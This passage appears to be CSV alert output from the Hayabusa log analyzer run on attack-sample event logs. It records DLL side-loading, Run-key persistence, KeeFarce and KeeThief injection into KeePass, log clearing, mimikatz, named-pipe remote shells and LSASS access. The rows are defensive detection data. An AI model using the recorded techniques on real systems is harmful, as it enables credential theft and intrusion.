| Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.868 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? | Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.868 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? 
| Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.884 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1060,technique_name=Registry Run Keys / Start Folder | SetValue: HKU\S-1-5-21-3583694148-1414552638-2922671848-1000\Software\Microsoft\Windows\CurrentVersion\Run\360v: C:\Users\IEUser\AppData\Roaming\svchost.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.884 +09:00,IEWIN7,13,medium,Persis,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.931 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2992 | Src PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Tgt PID: 3076 | Tgt PGUID: 365ABB72-7C01-5CC4-0000-00105C5C0C00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.931 
+09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: cmd.exe /A | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" | LID: 0xf4be | PID: 3076 | PGUID: 365ABB72-7C01-5CC4-0000-00105C5C0C00 | Hash: SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.931 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:54.134 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: ""C:\Windows\System32\cmd.exe"" /c del /q ""C:\Users\IEUser\Downloads\Flash_update.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\Flash_update.exe"" | LID: 0xf4be | PID: 3188 | PGUID: 365ABB72-7C02-5CC4-0000-0010FD6E0C00 | Hash: SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:54.165 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Downloads\Flash_update.exe | PID: 2680 | PGUID: 
365ABB72-7C01-5CC4-0000-00102B3E0C00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 03:47:00.046 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Cmd: KeeFarce.exe | Process: C:\Users\Public\KeeFarce.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0xffa8 | PID: 1288 | PGUID: 365ABB72-A3A4-5CC4-0000-001084960C00 | Hash: SHA1=C622268A9305BA27C78ECB5FFCC1D43B019847B5,MD5=07D86CD24E11C1B8F0C2F2029F9D3466,SHA256=F0D5C8E6DF82A7B026F4F0412F8EDE11A053185675D965215B1FFBBC52326516,IMPHASH=D94F14D149DD5809F1B4D1C38A1B4E40",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx +2019-04-28 03:47:00.046 +09:00,IEWIN7,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx +2019-04-28 03:47:00.062 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"creddump - keefarce HKTL | Image: C:\Users\Public\BootstrapDLL.dll | Process: C:\Program Files\KeePass Password Safe 2\KeePass.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 2364 | PGUID: 365ABB72-A201-5CC4-0000-00104F500800 | Hash: SHA1=B1230EC24647B3A6A21C2168134917642AE0F44A,MD5=A7683D7DC8C31E7162816D109C98D090,SHA256=92DDE9160B7A26FACD379166898E0A149F7EAD4B9D040AC974C4AFE6B4BD09B5,IMPHASH=E70B5F29E0EFB3558160EFC6DD598747",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx +2019-04-28 03:47:00.062 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Users\Public\KeeFarce.exe | Tgt Process: C:\Program Files\KeePass Password Safe 2\KeePass.exe | Src PID: 1288 | Src PGUID: 365ABB72-A3A4-5CC4-0000-001084960C00 | Tgt PID: 2364 | Tgt PGUID: 365ABB72-A201-5CC4-0000-00104F500800,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx +2019-04-28 03:47:00.062 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"creddump - keefarce HKTL | Image: C:\Users\Public\BootstrapDLL.dll | Process: C:\Users\Public\KeeFarce.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1288 | PGUID: 365ABB72-A3A4-5CC4-0000-001084960C00 | Hash: SHA1=B1230EC24647B3A6A21C2168134917642AE0F44A,MD5=A7683D7DC8C31E7162816D109C98D090,SHA256=92DDE9160B7A26FACD379166898E0A149F7EAD4B9D040AC974C4AFE6B4BD09B5,IMPHASH=E70B5F29E0EFB3558160EFC6DD598747",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx +2019-04-28 03:47:00.124 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\Public\KeeFarce.exe | PID: 1288 | PGUID: 365ABB72-A3A4-5CC4-0000-001084960C00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx +2019-04-28 03:55:04.710 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Program Files\KeePass Password Safe 2\KeePass.exe | Src PID: 2856 | Src PGUID: 365ABB72-A512-5CC4-0000-0010C05E1B00 | Tgt PID: 2364 | Tgt PGUID: 365ABB72-A201-5CC4-0000-00104F500800,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-28 03:55:04.710 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-28 03:55:04.710 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-28 03:55:04.980 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Program Files\KeePass Password Safe 2\KeePass.exe | Src PID: 2856 | Src PGUID: 365ABB72-A512-5CC4-0000-0010C05E1B00 | Tgt PID: 2364 | Tgt PGUID: 365ABB72-A201-5CC4-0000-00104F500800,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-28 03:55:04.980 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-28 03:55:04.980 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-28 04:27:55.274 +09:00,IEWIN7,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_chrome_firefox_opera_4663.evtx +2019-04-28 06:04:25.733 +09:00,DESKTOP-JR78RLP,104,high,Evas,System Log File Cleared,User: jwrig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx +2019-04-28 06:04:32.373 +09:00,DESKTOP-JR78RLP,7040,medium,Evas,Event Log Service Startup Type Changed To Disabled,Old Setting: auto start | New Setting: disabled,rules/hayabusa/default/alerts/System/7040_ImpairDefenses-DisableWindowsEventLogging_EventLogServiceStartupDisabled.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx +2019-04-29 01:29:42.988 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\Desktop\Win32\mimikatz.exe | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x800 | Src PID: 860 | Src PGUID: 365ABB72-D3C2-5CC5-0000-0010D9790500 | Tgt PID: 748 | Tgt PGUID: 365ABB72-D3E8-5CC5-0000-0010E7D30500,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx +2019-04-29 01:29:42.988 +09:00,IEWIN7,10,high,ResDev,Relevant Anti-Virus 
Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx +2019-04-30 05:59:14.447 +09:00,IEWIN7,18,info,,Pipe Connected,\46a676ab7f179e511e30dd2dc41bd388 | Process: System | PID: 4 | PGUID: 365ABB72-D9C4-5CC7-0000-0010EA030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:14.447 +09:00,IEWIN7,18,critical,Evas | PrivEsc,Malicious Named Pipe,,rules/sigma/pipe_created/sysmon_mal_namedpipes.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:15.575 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:445 (IEWIN7) | Dst: 10.0.2.17:63025 (NLLT106876) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-D9C4-5CC7-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:21.539 +09:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3940 | Src PGUID: 365ABB72-6231-5CC7-0000-00104CF71800 | Tgt PID: 3376 | Tgt PGUID: 365ABB72-65A9-5CC7-0000-00104E5C2400,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:21.539 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x10896 | PID: 3376 | PGUID: 
365ABB72-65A9-5CC7-0000-00104E5C2400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:21.539 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:21.539 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:22.144 +09:00,IEWIN7,10,low,,Process Access,Src Process: io\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\whoami.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3376 | Src PGUID: 365ABB72-65A9-5CC7-0000-00104E5C2400 | Tgt PID: 2116 | Tgt PGUID: 365ABB72-65AA-5CC7-0000-00104D882400,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:22.144 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" /all | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile | LID: 0x10896 | PID: 2116 | PGUID: 365ABB72-65AA-5CC7-0000-00104D882400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:22.144 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:22.144 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:22.144 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:55.472 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x10896 | PID: 2244 | PGUID: 365ABB72-65CB-5CC7-0000-001002202600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 16:22:56.571 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Programs\Opera\launcher.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Temp\opera autoupdate\installer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3712 | Src PGUID: 365ABB72-F7D0-5CC7-0000-0010D0220E00 | Tgt PID: 2784 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010CB280E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:22:56.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Programs\Opera\launcher.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3712 | Src PGUID: 365ABB72-F7D0-5CC7-0000-0010D0220E00 | Tgt PID: 3624 | Tgt PGUID: 
365ABB72-F7D0-5CC7-0000-0010DF2F0E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:22:57.149 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3624 | Src PGUID: 365ABB72-F7D0-5CC7-0000-0010DF2F0E00 | Tgt PID: 3504 | Tgt PGUID: 365ABB72-F7D1-5CC7-0000-0010AF380E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.883 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\smss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 264 | Tgt PGUID: 365ABB72-F69F-5CC7-0000-0010132B0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.883 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\csrss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 336 | Tgt PGUID: 
365ABB72-F6A1-5CC7-0000-001033480000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wininit.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 384 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-0010A74B0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\csrss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 392 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-00103F4C0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 440 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-001043520000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 468 | Tgt PGUID: 
365ABB72-F6A1-5CC7-0000-001004550000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-001072590000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\lsm.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 500 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-0010A3590000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 616 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-0010BB700000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 
+09:00,IEWIN7,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\VBoxService.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 676 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-0010E7AC0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: 